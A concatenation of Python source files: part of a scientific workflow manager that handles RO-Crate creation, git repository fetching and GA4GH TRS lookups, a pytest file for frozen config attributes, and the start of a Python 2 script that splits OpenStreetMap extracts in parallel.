raise WFException("Marshalled execution file already exists")
self.logger.debug("Marshalled execution file {} already exists".format(marshalled_execution_file))
else:
execution = {
'exitVal': self.exitVal,
'augmentedInputs': self.augmentedInputs,
'matCheckOutputs': self.matCheckOutputs
# TODO: check nothing essential was left
}
self.logger.debug("Creating marshalled execution file {}".format(marshalled_execution_file))
with open(marshalled_execution_file, mode='w', encoding='utf-8') as msF:
yaml.dump(marshall_namedtuple(execution), msF, Dumper=YAMLDumper)
self.executionMarshalled = True
elif not exist_ok:
raise WFException("Marshalled execution file already exists")
def unmarshallExecute(self, offline : bool = True):
if not self.executionMarshalled:
self.unmarshallStage(offline=offline)
marshalled_execution_file = os.path.join(self.metaDir, WORKDIR_MARSHALLED_EXECUTE_FILE)
if not os.path.exists(marshalled_execution_file):
raise WFException("Marshalled execution file does not exists. Execution state was not stored")
self.logger.debug("Parsing marshalled execution state file {}".format(marshalled_execution_file))
with open(marshalled_execution_file, mode='r', encoding='utf-8') as meF:
marshalled_execution = yaml.load(meF, Loader=YAMLLoader)
try:
execution = unmarshall_namedtuple(marshalled_execution, globals())
self.exitVal = execution['exitVal']
self.augmentedInputs = execution['augmentedInputs']
self.matCheckOutputs = execution['matCheckOutputs']
except Exception as e:
raise WFException("Error while unmarshalling content from execution state file {}. Reason: {}".format(marshalled_execution_file, e))
self.executionMarshalled = True
def marshallExport(self, exist_ok : bool = True):
if not self.exportMarshalled:
self.marshallExecute(exist_ok=exist_ok)
marshalled_export_file = os.path.join(self.metaDir, WORKDIR_MARSHALLED_EXPORT_FILE)
if os.path.exists(marshalled_export_file):
if not exist_ok:
raise WFException("Marshalled export results file already exists")
self.logger.debug("Marshalled export results file {} already exists".format(marshalled_export_file))
else:
exported_results = {
# TODO
}
self.logger.debug("Creating marshalled export results file {}".format(marshalled_export_file))
with open(marshalled_export_file, mode='w', encoding='utf-8') as msF:
yaml.dump(marshall_namedtuple(exported_results), msF, Dumper=YAMLDumper)
self.exportMarshalled = True
elif not exist_ok:
raise WFException("Marshalled export results file already exists")
def unmarshallExport(self, offline : bool = True):
if not self.exportMarshalled:
self.unmarshallExecute(offline=offline)
marshalled_export_file = os.path.join(self.metaDir, WORKDIR_MARSHALLED_EXPORT_FILE)
if not os.path.exists(marshalled_export_file):
raise WFException("Marshalled export results file does not exists. Export results state was not stored")
self.logger.debug("Parsing marshalled export results state file {}".format(marshalled_export_file))
with open(marshalled_export_file, mode='r', encoding='utf-8') as meF:
marshalled_export = yaml.load(meF, Loader=YAMLLoader)
try:
exported_results = unmarshall_namedtuple(marshalled_export, globals())
# TODO
except Exception as e:
raise WFException(f"Error while unmarshalling content from export results state file {marshalled_export_file}. Reason: {e}")
self.exportMarshalled = True
def createStageResearchObject(self, doMaterializedROCrate : bool = False):
"""
Create RO-crate from stage provenance.
"""
# TODO: implement deserialization
self.unmarshallStage(offline=True)
# TODO: implement logic of doMaterializedROCrate
# TODO
pass
def createResultsResearchObject(self, doMaterializedROCrate : bool = False):
"""
Create RO-crate from execution provenance.
"""
# TODO: implement deserialization
self.unmarshallExport(offline=True)
# TODO: implement logic of doMaterializedROCrate
# TODO: digest the results from executeWorkflow plus all the provenance
# Create RO-crate using crate.zip downloaded from WorkflowHub
if os.path.isfile(str(self.cacheROCrateFilename)):
wfCrate = rocrate.ROCrate(self.cacheROCrateFilename)
# Create RO-Crate using rocrate_api
# TODO no exists the version implemented for Nextflow in rocrate_api
else:
# FIXME: What to do when workflow is in git repository different from GitHub??
# FIXME: What to do when workflow is not in a git repository??
wf_path = os.path.join(self.localWorkflow.dir, self.localWorkflow.relPath)
wfCrate, compLang = self.materializedEngine.instance.getEmptyCrateAndComputerLanguage(
self.localWorkflow.langVersion)
wf_url = self.repoURL.replace(".git", "/") + "tree/" + self.repoTag + "/" + os.path.dirname(
self.localWorkflow.relPath)
# TODO create method to create wf_url
matWf = self.materializedEngine.workflow
parsed_repo_url = parse.urlparse(self.repoURL)
if parsed_repo_url.netloc == 'github.com':
parsed_repo_path = parsed_repo_url.path.split('/')
repo_name = parsed_repo_path[2]
if repo_name.endswith('.git'):
repo_name = repo_name[:-4]
wf_entrypoint_path = [
'', # Needed to prepend a slash
parsed_repo_path[1],
repo_name,
matWf.effectiveCheckout,
self.localWorkflow.relPath
]
wf_entrypoint_url = parse.urlunparse(
('https', 'raw.githubusercontent.com', '/'.join(wf_entrypoint_path), '', '', ''))
else:
raise WFException("FIXME: Unsupported http(s) git repository {}".format(self.repoURL))
# TODO assign something meaningful to cwl
cwl = True
workflow_path = Path(wf_path)
wf_file = wfCrate.add_workflow(
str(workflow_path), workflow_path.name, fetch_remote=False,
main=True, lang=compLang, gen_cwl=(cwl is None)
)
# This is needed, as it is not automatically added when the
# `lang` argument in workflow creation was not a string
wfCrate.add(compLang)
# if the source is a remote URL then add https://schema.org/codeRepository
# property to it this can be checked by checking if the source is a URL
# instead of a local path
wf_file.properties()['url'] = wf_entrypoint_url
wf_file.properties()['codeRepository'] = wf_url
# if 'url' in wf_file.properties():
# wf_file['codeRepository'] = wf_file['url']
# TODO: add extra files, like nextflow.config in the case of
# Nextflow workflows, the diagram, an abstract CWL
# representation of the workflow (when it is not a CWL workflow)
# etc...
# for file_entry in include_files:
# wfCrate.add_file(file_entry)
wfCrate.isBasedOn = wf_url
# Add inputs provenance to RO-crate
for in_item in self.augmentedInputs:
if isinstance(in_item, MaterializedInput):
itemInValues = in_item.values[0]
if isinstance(itemInValues, MaterializedContent):
# TODO: embed metadata_array in some way
itemInSource = itemInValues.local
if os.path.isfile(itemInSource):
properties = {
'name': in_item.name,
'url': itemInValues.uri
}
wfCrate.add_file(source=itemInSource, properties=properties)
elif os.path.isdir(itemInSource):
self.logger.error("FIXME: input directory / dataset handling in RO-Crate")
else:
pass # TODO raise Exception
# TODO digest other types of inputs
# Add outputs provenance to RO-crate
# for out_item in self.matCheckOutputs:
# if isinstance(out_item, MaterializedOutput):
# itemOutKind = out_item.kind.value
# itemOutValues = out_item.values[0]
# itemOutSource = itemOutValues.local
# properties = {'name': out_item.name}
# if itemOutKind == "dir":
# if isinstance(itemOutValues, GeneratedDirectoryContent):
# if os.path.isdir(itemOutSource):
# dirProperties = dict.fromkeys(['values'])
# dirProperties['values'] = itemOutValues.values
# properties.update(dirProperties)
# wfCrate.add_directory(source=itemOutSource, properties=properties)
#
# else:
# pass # TODO raise Exception
#
# elif itemOutKind == "file":
# if isinstance(itemOutValues, GeneratedContent):
# if os.path.isfile(itemOutSource):
# fileProperties = {
# 'uri': itemOutValues.uri
# }
# properties.update(fileProperties)
# wfCrate.add_file(source=itemOutSource, properties=properties)
#
# else:
# pass # TODO raise Exception
# # elif itemOutKind == "val":
# else:
# pass # TODO raise Exception
# Save RO-crate as execution.crate.zip
wfCrate.writeZip(os.path.join(self.outputsDir, "execution.crate"))
self.logger.info("RO-Crate created: {}".format(self.outputsDir))
# TODO error handling
def doMaterializeRepo(self, repoURL, repoTag: RepoTag = None, doUpdate: bool = True) -> Tuple[AbsPath, RepoTag]:
"""
:param repoURL:
:param repoTag:
:param doUpdate:
:return:
"""
repo_hashed_id = hashlib.sha1(repoURL.encode('utf-8')).hexdigest()
repo_hashed_tag_id = hashlib.sha1(b'' if repoTag is None else repoTag.encode('utf-8')).hexdigest()
# Assure directory exists before next step
repo_destdir = os.path.join(self.cacheWorkflowDir, repo_hashed_id)
if not os.path.exists(repo_destdir):
try:
os.makedirs(repo_destdir)
except IOError:
errstr = "ERROR: Unable to create intermediate directories for repo {}. ".format(repoURL)
raise WFException(errstr)
repo_tag_destdir = os.path.join(repo_destdir, repo_hashed_tag_id)
# We are assuming that, if the directory does exist, it contains the repo
doRepoUpdate = True
if not os.path.exists(repo_tag_destdir):
# Try cloning the repository without initial checkout
if repoTag is not None:
gitclone_params = [
self.git_cmd, 'clone', '-n', '--recurse-submodules', repoURL, repo_tag_destdir
]
# Now, checkout the specific commit
gitcheckout_params = [
self.git_cmd, 'checkout', repoTag
]
else:
# We know nothing about the tag, or checkout
gitclone_params = [
self.git_cmd, 'clone', '--recurse-submodules', repoURL, repo_tag_destdir
]
gitcheckout_params = None
elif doUpdate:
gitclone_params = None
gitcheckout_params = [
self.git_cmd, 'pull', '--recurse-submodules'
]
if repoTag is not None:
gitcheckout_params.extend(['origin', repoTag])
else:
doRepoUpdate = False
if doRepoUpdate:
with tempfile.NamedTemporaryFile() as git_stdout, tempfile.NamedTemporaryFile() as git_stderr:
# First, (bare) clone
retval = 0
if gitclone_params is not None:
retval = subprocess.call(gitclone_params, stdout=git_stdout, stderr=git_stderr)
# Then, checkout (which can be optional)
if retval == 0 and (gitcheckout_params is not None):
retval = subprocess.Popen(gitcheckout_params, stdout=git_stdout, stderr=git_stderr,
cwd=repo_tag_destdir).wait()
# Last, submodule preparation
if retval == 0:
# Last, initialize submodules
gitsubmodule_params = [
self.git_cmd, 'submodule', 'update', '--init', '--recursive'
]
retval = subprocess.Popen(gitsubmodule_params, stdout=git_stdout, stderr=git_stderr,
cwd=repo_tag_destdir).wait()
# Proper error handling
if retval != 0:
# Reading the output and error for the report
with open(git_stdout.name, "r") as c_stF:
git_stdout_v = c_stF.read()
with open(git_stderr.name, "r") as c_stF:
git_stderr_v = c_stF.read()
errstr = "ERROR: Unable to pull '{}' (tag '{}'). Retval {}\n======\nSTDOUT\n======\n{}\n======\nSTDERR\n======\n{}".format(
repoURL, repoTag, retval, git_stdout_v, git_stderr_v)
raise WFException(errstr)
# Last, we have to obtain the effective checkout
gitrevparse_params = [
self.git_cmd, 'rev-parse', '--verify', 'HEAD'
]
with subprocess.Popen(gitrevparse_params, stdout=subprocess.PIPE, encoding='iso-8859-1',
cwd=repo_tag_destdir) as revproc:
repo_effective_checkout = revproc.stdout.read().rstrip()
return repo_tag_destdir, repo_effective_checkout
def getWorkflowRepoFromTRS(self, offline: bool = False) -> Tuple[WorkflowType, RepoURL, RepoTag, RelPath]:
"""
:return:
"""
# Now, time to check whether it is a TRSv2
trs_endpoint_v2_meta = self.trs_endpoint + 'service-info'
trs_endpoint_v2_beta2_meta = self.trs_endpoint + 'metadata'
trs_endpoint_meta = None
# Needed to store this metadata
trsMetadataCache = os.path.join(self.metaDir, self.TRS_METADATA_FILE)
try:
metaContentKind , cachedTRSMetaFile , trsMetaMeta = self.cacheHandler.fetch(trs_endpoint_v2_meta, self.metaDir, offline)
trs_endpoint_meta = trs_endpoint_v2_meta
except WFException as wfe:
try:
metaContentKind , cachedTRSMetaFile , trsMetaMeta = self.cacheHandler.fetch(trs_endpoint_v2_beta2_meta, self.metaDir, offline)
trs_endpoint_meta = trs_endpoint_v2_beta2_meta
except WFException as wfebeta:
raise WFException("Unable to fetch metadata from {} in order to identify whether it is a working GA4GH TRSv2 endpoint. Exceptions:\n{}\n{}".format(self.trs_endpoint, wfe, wfebeta))
# Giving a friendly name
if not os.path.exists(trsMetadataCache):
os.symlink(os.path.basename(cachedTRSMetaFile), trsMetadataCache)
with open(trsMetadataCache, mode="r", encoding="utf-8") as ctmf:
self.trs_endpoint_meta = json.load(ctmf)
# Minimal check
trs_version = self.trs_endpoint_meta.get('api_version')
if trs_version is None:
trs_version = self.trs_endpoint_meta.get('type', {}).get('version')
if trs_version is None:
raise WFException("Unable to identify TRS version from {}".format(trs_endpoint_meta))
# Now, check the tool does exist in the TRS, and the version
trs_tools_url = parse.urljoin(self.trs_endpoint, self.TRS_TOOLS_PATH + parse.quote(self.id, safe=''))
trsQueryCache = os.path.join(self.metaDir, self.TRS_QUERY_CACHE_FILE)
_ , cachedTRSQueryFile , _ = self.cacheHandler.fetch(trs_tools_url, self.metaDir, offline)
# Giving a friendly name
if not os.path.exists(trsQueryCache):
os.symlink(os.path.basename(cachedTRSQueryFile), trsQueryCache)
with open(trsQueryCache, mode="r", encoding="utf-8") as tQ:
rawToolDesc = tQ.read()
# If the tool does not exist, an exception will be thrown before
jd = json.JSONDecoder()
toolDesc = jd.decode(rawToolDesc)
# If the tool is not a workflow, complain
if toolDesc.get('toolclass', {}).get('name', '') != 'Workflow':
raise WFException(
'Tool {} from {} is not labelled as a workflow. Raw answer:\n{}'.format(self.id, self.trs_endpoint,
rawToolDesc))
possibleToolVersions = toolDesc.get('versions', [])
if len(possibleToolVersions) == 0:
raise WFException(
'Version {} not found in workflow {} from {} . Raw answer:\n{}'.format(self.version_id, self.id,
self.trs_endpoint, rawToolDesc))
toolVersion = None
toolVersionId = self.version_id
if (toolVersionId is not None) and len(toolVersionId) > 0:
for possibleToolVersion in possibleToolVersions:
if isinstance(possibleToolVersion, dict):
possibleId = str(possibleToolVersion.get('id', ''))
possibleName = str(possibleToolVersion.get('name', ''))
if self.version_id in (possibleId, possibleName):
toolVersion = possibleToolVersion
break
else:
raise WFException(
'Version {} not found in workflow {} from {} . Raw answer:\n{}'.format(self.version_id, self.id,
self.trs_endpoint,
rawToolDesc))
else:
toolVersionId = ''
for possibleToolVersion in possibleToolVersions:
possibleToolVersionId = str(possibleToolVersion.get('id', ''))
if len(possibleToolVersionId) > 0 and toolVersionId < possibleToolVersionId:
toolVersion = possibleToolVersion
toolVersionId = possibleToolVersionId
if toolVersion is None:
raise WFException(
'No valid version was found in workflow {} from {} . Raw answer:\n{}'.format(self.id, self.trs_endpoint,
rawToolDesc))
# The version has been found
toolDescriptorTypes = toolVersion.get('descriptor_type', [])
if not isinstance(toolDescriptorTypes, list):
raise WFException(
'Version {} of workflow {} from {} has no valid "descriptor_type" (should be a list). Raw answer:\n{}'.format(
self.version_id, self.id, self.trs_endpoint, rawToolDesc))
# Now, realize whether it matches
chosenDescriptorType = self.descriptor_type
if chosenDescriptorType is None:
for candidateDescriptorType in self.RECOGNIZED_TRS_DESCRIPTORS.keys():
if candidateDescriptorType in toolDescriptorTypes:
chosenDescriptorType = candidateDescriptorType
break
else:
raise WFException(
'Version {} of workflow {} from {} has no acknowledged "descriptor_type". Raw answer:\n{}'.format(
self.version_id, self.id, self.trs_endpoint, rawToolDesc))
elif chosenDescriptorType not in toolVersion['descriptor_type']:
raise WFException(
'Descriptor type {} not available for version {} of workflow {} from {} . Raw answer:\n{}'.format(
self.descriptor_type, self.version_id, self.id, self.trs_endpoint, rawToolDesc))
elif chosenDescriptorType not in self.RECOGNIZED_TRS_DESCRIPTORS:
raise WFException(
'Descriptor type {} is not among the acknowledged ones by this backend. Version {} of workflow {} from {} . Raw answer:\n{}'.format(
self.descriptor_type, self.version_id, self.id, self.trs_endpoint, rawToolDesc))
toolFilesURL = trs_tools_url + '/versions/' + parse.quote(toolVersionId, safe='') + '/' + parse.quote(chosenDescriptorType, safe='') + '/files'
# Detecting whether RO-Crate trick will work
if self.trs_endpoint_meta.get('organization',{}).get('name') == 'WorkflowHub':
self.logger.debug("WorkflowHub workflow")
# And this is the moment where the RO-Crate must be fetched
roCrateURL = toolFilesURL + '?' + parse.urlencode({'format': 'zip'})
return self.getWorkflowRepoFromROCrateURL(roCrateURL,
expectedEngineDesc=self.RECOGNIZED_TRS_DESCRIPTORS[
chosenDescriptorType], offline=offline)
else:
self.logger.debug("TRS workflow")
# Learning the available files and maybe
# which is the entrypoint to the workflow
_ , trsFilesDir , trsFilesMeta = self.cacheHandler.fetch(INTERNAL_TRS_SCHEME_PREFIX + ':' + toolFilesURL, self.cacheTRSFilesDir, offline)
expectedEngineDesc = self.RECOGNIZED_TRS_DESCRIPTORS[chosenDescriptorType]
remote_workflow_entrypoint = trsFilesMeta[0].metadata.get('remote_workflow_entrypoint')
if remote_workflow_entrypoint is not None:
# Give it a chance to identify the original repo of the workflow
repoURL, repoTag, repoRelPath = self.guessRepoParams(remote_workflow_entrypoint, fail_ok=False)
if repoURL is not None:
self.logger.debug("Derived repository {} ({} , rel {}) from {}".format(repoURL, repoTag, repoRelPath, trs_tools_url))
return expectedEngineDesc , repoURL, repoTag, repoRelPath
workflow_entrypoint = trsFilesMeta[0].metadata.get('workflow_entrypoint')
if workflow_entrypoint is not None:
self.logger.debug("Using raw files from TRS tool {}".format(trs_tools_url))
repoDir = trsFilesDir
repoRelPath = workflow_entrypoint
return expectedEngineDesc , repoDir, None, repoRelPath
raise WFException("Unable to find a workflow in {}".format(trs_tools_url))
def getWorkflowRepoFromROCrateURL(self, roCrateURL, expectedEngineDesc: WorkflowType = None, offline: bool = False) -> Tuple[WorkflowType, RepoURL, RepoTag, RelPath]:
"""
:param roCrateURL:
:param expectedEngineDesc: If defined, an instance of WorkflowType
:return:
"""
roCrateFile = self.downloadROcrate(roCrateURL, offline=offline)
self.logger.info("downloaded RO-Crate: {} -> {}".format(roCrateURL, roCrateFile))
return self.getWorkflowRepoFromROCrateFile(roCrateFile, expectedEngineDesc)
def getWorkflowRepoFromROCrateFile(self, roCrateFile: AbsPath, expectedEngineDesc: WorkflowType = None) -> Tuple[WorkflowType, RepoURL, RepoTag, RelPath]:
"""
:param roCrateFile:
:param expectedEngineDesc: If defined, an instance of WorkflowType
:return:
"""
roCrateObj = rocrate.ROCrate(roCrateFile)
# TODO: get roCrateObj mainEntity programming language
# self.logger.debug(roCrateObj.root_dataset.as_jsonld())
mainEntityProgrammingLanguageId = None
mainEntityProgrammingLanguageUrl = None
mainEntityIdHolder = None
mainEntityId = None
workflowPID = None
workflowUploadURL = None
workflowTypeId = None
for e in roCrateObj.get_entities():
if (mainEntityIdHolder is None) and e['@type'] == 'CreativeWork' and '.json' in e['@id']:
mainEntityIdHolder = e.as_jsonld()['about']['@id']
elif e['@id'] == mainEntityIdHolder:
eAsLD = e.as_jsonld()
mainEntityId = eAsLD['mainEntity']['@id']
workflowPID = eAsLD.get('identifier')
elif e['@id'] == mainEntityId:
eAsLD = e.as_jsonld()
workflowUploadURL = eAsLD.get('url')
workflowTypeId = eAsLD['programmingLanguage']['@id']
elif e['@id'] == workflowTypeId:
# A bit dirty, but it works
eAsLD = e.as_jsonld()
mainEntityProgrammingLanguageId = eAsLD.get('identifier', {}).get('@id')
mainEntityProgrammingLanguageUrl = eAsLD.get('url', {}).get('@id')
# Now, it is time to match the language id
engineDescById = None
engineDescByUrl = None
for possibleEngineDesc in self.WORKFLOW_ENGINES:
if (engineDescById is None) and (mainEntityProgrammingLanguageId is not None):
for pat in possibleEngineDesc.uriMatch:
if isinstance(pat, Pattern):
match = pat.search(mainEntityProgrammingLanguageId)
if match:
engineDescById = possibleEngineDesc
elif pat == mainEntityProgrammingLanguageId:
engineDescById = possibleEngineDesc
if (engineDescByUrl is None) and (mainEntityProgrammingLanguageUrl == possibleEngineDesc.url):
engineDescByUrl = possibleEngineDesc
engineDesc = None
if engineDescById is not None:
engineDesc = engineDescById
elif engineDescByUrl is not None:
engineDesc = engineDescByUrl
else:
raise WFException(
'Found programming language {} (url {}) in RO-Crate manifest is not among the acknowledged ones'.format(
mainEntityProgrammingLanguageId, mainEntityProgrammingLanguageUrl))
if (engineDescById is not None) and (engineDescByUrl is not None) and engineDescById != engineDescByUrl:
self.logger.warning('Found programming language {} (url {}) leads to different engines'.format(
mainEntityProgrammingLanguageId, mainEntityProgrammingLanguageUrl))
if (expectedEngineDesc is not None) and engineDesc != expectedEngineDesc:
raise WFException(
'Expected programming language {} does not match identified one {} in RO-Crate manifest'.format(
expectedEngineDesc.engineName, engineDesc.engineName))
# This workflow URL, in the case of github, can provide the repo,
# the branch/tag/checkout , and the relative directory in the
# fetched content (needed by Nextflow)
# Some RO-Crates might have this value missing or ill-built
if workflowUploadURL is not None:
repoURL, repoTag, repoRelPath = self.guessRepoParams(workflowUploadURL, fail_ok=False)
if repoURL is None:
repoURL, repoTag, repoRelPath = self.guessRepoParams(roCrateObj.root_dataset['isBasedOn'], fail_ok=False)
if repoURL is None:
raise WFException('Unable to guess repository from RO-Crate manifest')
# It must return four elements:
return engineDesc, repoURL, repoTag, repoRelPath
def guessRepoParams(self, wf_url: Union[URIType, parse.ParseResult], fail_ok: bool = True) -> Tuple[RepoURL, RepoTag, RelPath]:
repoURL = None
repoTag = None
repoRelPath = None
# Deciding which is the input
if isinstance(wf_url, parse.ParseResult):
parsed_wf_url = wf_url
else:
parsed_wf_url = parse.urlparse(wf_url)
# These are the usual URIs which can be understood by pip
# See https://pip.pypa.io/en/stable/cli/pip_install/#git
if parsed_wf_url.scheme.startswith('git+') or parsed_wf_url.scheme == 'git':
# Getting the scheme git is going to understand
if len(parsed_wf_url.scheme) > 3:
gitScheme = parsed_wf_url.scheme[4:]
else:
gitScheme = parsed_wf_url.scheme
# Getting the tag or branch
if '@' in parsed_wf_url.path:
gitPath , repoTag = parsed_wf_url.path.split('@',1)
else:
gitPath = parsed_wf_url.path
# Getting the repoRelPath (if available)
if len(parsed_wf_url.fragment) > 0:
frag_qs = parse.parse_qs(parsed_wf_url.fragment)
subDirArr = frag_qs.get('subdirectory',[])
if len(subDirArr) > 0:
repoRelPath = subDirArr[0]
# Now, reassemble the repoURL
repoURL = parse.urlunparse((gitScheme, parsed_wf_url.netloc, gitPath, '', '', ''))
# TODO handling other popular cases, like bitbucket
elif parsed_wf_url.netloc == 'github.com':
wf_path = parsed_wf_url.path.split('/')
if len(wf_path) >= 3:
repoGitPath = wf_path[:3]
if not repoGitPath[-1].endswith('.git'):
repoGitPath[-1] += '.git'
# Rebuilding repo git path
repoURL = parse.urlunparse(
(parsed_wf_url.scheme, parsed_wf_url.netloc, '/'.join(repoGitPath), '', '', ''))
# And now, guessing the tag and the relative path
if len(wf_path) >= 5 and (wf_path[3] in ('blob', 'tree')):
repoTag = wf_path[4]
if len(wf_path) >= 6:
repoRelPath = '/'.join(wf_path[5:])
elif parsed_wf_url.netloc == 'raw.githubusercontent.com':
wf_path = parsed_wf_url.path.split('/')
if len(wf_path) >= 3:
# Rebuilding it
repoGitPath = wf_path[:3]
repoGitPath[-1] += '.git'
# Rebuilding repo git path
repoURL = parse.urlunparse(
('https', 'github.com', '/'.join(repoGitPath), '', '', ''))
# And now, guessing the tag/checkout and the relative path
if len(wf_path) >= 4:
repoTag = wf_path[3]
if len(wf_path) >= 5:
repoRelPath = '/'.join(wf_path[4:])
elif fail_ok:
raise WFException("FIXME: Unsupported http(s) git repository {}".format(wf_url))
self.logger.debug("From {} was derived {} {} {}".format(wf_url, repoURL, repoTag, repoRelPath))
return repoURL, repoTag, repoRelPath
def downloadROcrate(self, roCrateURL, offline: bool = False) -> AbsPath:
"""
Download RO-crate from WorkflowHub (https://dev.workflowhub.eu/)
using GA4GH TRS API and save RO-Crate in path.
:param roCrateURL: location path to save RO-Crate
:param offline: Are we in offline mode?
:type roCrateURL: str
:type offline: bool
:return:
"""
try:
roCK , roCrateFile , _ = self.cacheHandler.fetch(roCrateURL, self.cacheROCrateDir, offline)
except Exception as e:
raise WFException("Cannot download RO-Crate from {}, {}".format(roCrateURL, e))
crate_hashed_id = hashlib.sha1(roCrateURL.encode('utf-8')).hexdigest()
cachedFilename = os.path.join(self.cacheROCrateDir, crate_hashed_id + self.DEFAULT_RO_EXTENSION)
if not os.path.exists(cachedFilename):
os.symlink(os.path.basename(roCrateFile),cachedFilename)
self.cacheROCrateFilename = cachedFilename
return cachedFilename
def downloadInputFile(self, remote_file, workflowInputs_destdir: AbsPath = None,
contextName=None, offline: bool = False, ignoreCache:bool=False, registerInCache:bool=True) -> MaterializedContent:
"""
Download remote file or directory / dataset.
:param remote_file: URL or CURIE to download remote file
:param contextName:
:param workflowInputs_destdir:
:param offline:
:type remote_file: str
"""
parsedInputURL = parse.urlparse(remote_file)
if not all([parsedInputURL.scheme, parsedInputURL.path]):
raise RuntimeError("Input is not a valid remote URL or CURIE source")
else:
prettyFilename = parsedInputURL.path.split('/')[-1]
# Assure workflow inputs directory exists before the next step
if workflowInputs_destdir is None:
workflowInputs_destdir = self.cacheWorkflowInputsDir
self.logger.info("downloading workflow input: {}".format(remote_file))
# Security context is obtained here
secContext = None
if contextName is not None:
secContext = self.creds_config.get(contextName)
if secContext is None:
raise WFException(
'No security context {} is available, needed by {}'.format(contextName, remote_file))
inputKind, cachedFilename, metadata_array = self.cacheHandler.fetch(remote_file, workflowInputs_destdir, offline, ignoreCache, registerInCache, secContext)
self.logger.info("downloaded workflow input: {} => {}".format(remote_file, cachedFilename))
return MaterializedContent(cachedFilename, remote_file, prettyFilename, inputKind, metadata_array)
|
test_frozen_attribs.py | from typing import Dict, Any
from torch import nn
from core.base_abstractions.experiment_config import ExperimentConfig
from core.base_abstractions.task import TaskSampler
from utils.experiment_utils import TrainingPipeline
import torch.multiprocessing as mp
# noinspection PyAbstractClass,PyTypeChecker
class MyConfig(ExperimentConfig):
MY_VAR: int = 3
@classmethod
def tag(cls) -> str:
return ""
@classmethod
def training_pipeline(cls, **kwargs) -> TrainingPipeline:
return None
@classmethod
def create_model(cls, **kwargs) -> nn.Module:
return None
@classmethod
def make_sampler_fn(cls, **kwargs) -> TaskSampler:
return None
def my_var_is(self, val):
assert self.MY_VAR == val
# noinspection PyAbstractClass
class MySpecConfig(MyConfig):
MY_VAR = 6
@classmethod
def machine_params(cls, mode="train", **kwargs) -> Dict[str, Any]:
return {}
@classmethod
def tag(cls) -> str:
return "SpecTag"
scfg = MySpecConfig()
class TestFrozenAttribs(object):
def test_frozen_inheritance(self):
from abc import abstractmethod
from core.base_abstractions.experiment_config import FrozenClassVariables
class SomeBase(metaclass=FrozenClassVariables):
yar = 3
@abstractmethod
def use(self):
raise NotImplementedError()
class SomeDerived(SomeBase):
yar = 33
def use(self):
return self.yar
failed = False
try:
SomeDerived.yar = 6 # Error
except Exception as _:
failed = True
assert failed
inst = SomeDerived()
inst2 = SomeDerived()
inst.yar = 12 # No error
assert inst.use() == 12
assert inst2.use() == 33
@staticmethod
def my_func(config, val):
config.my_var_is(val)
def test_frozen_experiment_config(self):
val = 5
failed = False
try:
MyConfig()
except:
failed = True
assert failed
scfg.MY_VAR = val
scfg.my_var_is(val)
failed = False
try:
MyConfig.MY_VAR = val
except RuntimeError:
failed = True
assert failed
failed = False
try:
MySpecConfig.MY_VAR = val
except RuntimeError:
failed = True
assert failed
for fork_method in ["forkserver", "fork"]:
ctxt = mp.get_context(fork_method)
p = ctxt.Process(target=self.my_func, kwargs=dict(config=scfg, val=val))
p.start()
p.join()
if __name__ == "__main__":
TestFrozenAttribs().test_frozen_inheritance() # type:ignore
TestFrozenAttribs().test_frozen_experiment_config() # type:ignore
|
split-all-clipbounds.py | #!/usr/bin/python
import sys, os, tempfile
from datetime import datetime
import Queue, threading
import random, time
# just simulate the splitting by sleeping for a randome number of seconds,
# used to test mutoprocess handling
simulate = True
# the directory to scan for clipbounds-files
clipDir = "clipbounds"
# the type of clipbounds to use (OSM or POLY)
clipType = "POLY" # OSM
clipExtension = ".poly" # .osm
# the clipbounds are read from the directory and created in a hirachy, so
# clipbounds/europe.poly is read from the planetfile
# clipbounds/asia.poly is read from the planetfile
# clipbounds/europe/germany.poly is read from the generated europe.osm.pbf
# clipbounds/europe/italy.poly is read from the generated europe.osm.pbf
# clipbounds/foo/bar.poly is read from the planetfile, because there was no foo.poly
# the desired result datatype (.osm.pbf, .osh.pbf, .osm, .osh, ...)
dataType = ".osm.pbf"
# the maximum number of parallel running extracts
# this is ( <your systems memory in GB> - 1) * 1024 / <size per extract>
# where <size per extract> is 190 MB for Hardcut and 350 MB for Softcut
#
# to achive best results, set maxProcesses = 1 and start with a low value
# for maxParallel, the run the tool a little. increase maxParallel,
# re-run the tool for some seconds, ...
# when creating the last bit-vector takes more time then creating the
# first vectors, the os starts to swap the bit-vectors out. reduce the
# number by one and try again
maxParallel = 8
# the number of parallel extracts is determined by the available memory.
# when all bit-vectory fit into the RAM, runtime is mostly a matter of CPU.
# if you have multiple cores, you can split quicker by distributing the
# point-in-polygon tests about your cores. This increases the number of
# disk-seeks, because multiple processes tries to access the same file,
# but in most cases this should not hit the performance much.
maxProcesses = 4
# on my PC (4 GB, 4 Cores) i achived best results when doing 8 extracts
# in parallel with 4 processes.
# the source file
inputFile = "/home/peter/osm-data/planet-latest.osm.pbf"
# the directory to place the generated extracts into
outputDir = "o"
# path to the compiled splitter
splitterCommand = "osm-history-splitter"
if(sys.argv.count("--plan") > 0):
maxParallel = maxParallel / maxProcesses
maxProcesses = 1
printlock = threading.Lock()
q = Queue.Queue(0)
finished = []
def process(tasks):
(source, foo) = os.path.split(tasks[0])
if(source == ""):
source = inputFile
else:
if finished.count(source) == 0:
printlock.acquire()
print "trying to split from", source, "which is not finished yet, re-queuing and sleeping 5 seconds"
printlock.release()
q.put(tasks)
time.sleep(5)
return
source = outputDir + "/" + source + dataType
if not simulate and not os.path.exists(source):
source = inputFile
printlock.acquire()
print "splitting", source, "to", tasks
printlock.release()
if(sys.argv.count("--plan") > 0):
return
(fp, configfile) = tempfile.mkstemp()
os.write(fp, "# auto-generated\n")
for task in tasks:
dest = os.path.join(outputDir, task + dataType)
dirname = os.path.dirname(dest)
if not os.path.exists(dirname):
printlock.acquire()
print "Creating", dirname
os.mkdir(dirname)
printlock.release()
os.write(fp, dest)
os.write(fp, "\t")
os.write(fp, clipType)
os.write(fp, "\t")
os.write(fp, clipDir + "/" + task + clipExtension)
os.write(fp, "\n")
os.close(fp)
start = datetime.now()
if(simulate):
time.sleep(random.randint(1, 10))
else:
os.spawnl(os.P_WAIT, splitterCommand, splitterCommand, "--softcut", source, configfile)
printlock.acquire()
print "finished splitting to", tasks
print "runtime:", datetime.now() - start
printlock.release()
for task in tasks:
finished.append(task)
os.unlink(configfile)
def worker():
while True:
item = q.get()
process(item)
q.task_done()
print "starting", maxProcesses, "threads"
for i in range(maxProcesses):
t = threading.Thread(target=worker)
t.daemon = True
t.start()
tasksPerProc = maxParallel / maxProcesses
tasks = []
lastdir = "";
stack = [clipDir]
while stack:
directory = stack.pop(0)
for base in sorted(os.listdir(directory)):
